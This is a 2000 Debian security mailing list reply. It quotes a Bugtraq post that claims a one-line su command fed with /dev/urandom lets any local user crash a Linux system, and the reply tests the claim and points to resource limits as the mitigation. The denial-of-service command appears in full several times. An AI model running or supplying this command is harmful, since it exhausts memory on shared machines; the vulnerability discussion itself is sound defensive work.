On Fri, Mar 24, 2000 at 09:38:33PM -0700, Nathan Paul Simons wrote: > Has anyone else seen this? i tested it with the latest shellutils > from the frozen dist, and it appears to work. It should also be noted > that i tested this on my alpha box (running RedHat 6.1) and it didn't do > anything except give an error message. The version included with RedHat > 6.1 is sh-utils 2.0. i haven't looked yet but, i'm willing to bet that > this was already noticed and fixed and people (including distro > maintainers) just need to upgrade. I just tried this on my powerpc box (blue G3 400) with current frozen and it did not crash my system. I ran this command twice on two VCs they ran for awhile and slowed stuff down a little (noticable if i say, did ls -l /usr/bin) but after a minute or so bash killed the processes: [eb@socrates eb]$ su `cat /dev/urandom` > /dev/null |< su `cat /dev/urandom`& [1] 7080 [eb@socrates eb]$ bash: xrealloc: cannot reallocate 16777216 bytes (0 bytes allocated) bash: xrealloc: cannot reallocate 16777216 bytes (0 bytes allocated) [1]+ Exit 2 su `cat /dev/urandom` >/dev/null | `cat /dev/urandom` <su [eb@socrates eb]$ perhaps this is because i have resource limits set? [eb@socrates eb]$ ulimit -a core file size (blocks) 1000000 data seg size (kbytes) 102400 file size (blocks) unlimited max locked memory (kbytes) 5120 max memory size (kbytes) 46080 open files 256 pipe size (512 bytes) 8 stack size (kbytes) 8192 cpu time (seconds) 63072000 max user processes 100 virtual memory (kbytes) 51200 [eb@socrates eb]$ this system has 128 MB of real ram and a 96MB swap partition. as for redhat i think they use GNU su do they not? we (and presumably slack) are using the simple shadow su (why?). > ----- Forwarded message from Javor Ninov <javor@multigroup-bg.com> ----- > > Approved-By: aleph1@SECURITYFOCUS.COM > Delivered-To: bugtraq@lists.securityfocus.com > Delivered-To: bugtraq@securityfocus.com > X-Priority: 3 > X-MSMail-Priority: Normal > X-Mailer: Microsoft Outlook Express 5.00.2919.6600 > X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 > Date: Fri, 24 Mar 2000 18:42:03 +0200 > Reply-To: Javor Ninov <javor@multigroup-bg.com> > From: Javor Ninov <javor@multigroup-bg.com> > Subject: Local Linux Crash > X-To: bugtraq <bugtraq@securityfocus.com> > To: BUGTRAQ@SECURITYFOCUS.COM > > Tested on SlackWare 7.0 2.2.14 > After short time this will crash Linux box: > su `cat /dev/urandom` > /dev/null |< su `cat /dev/urandom`& > > for a better efect start it several times :-)) > This can be done be any regular user ! > > ----- End forwarded message ----- > > Nathan Paul Simons > http://www.nmt.edu/~npsimons/ > > > > -- > To UNSUBSCRIBE, email to debian-security-request@lists.debian.org > with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org > -- Ethan Benson http://www.alaska.net/~erbenson/
Attachment:
pgp0Ruj_4E86j.pgp
Description: PGP signature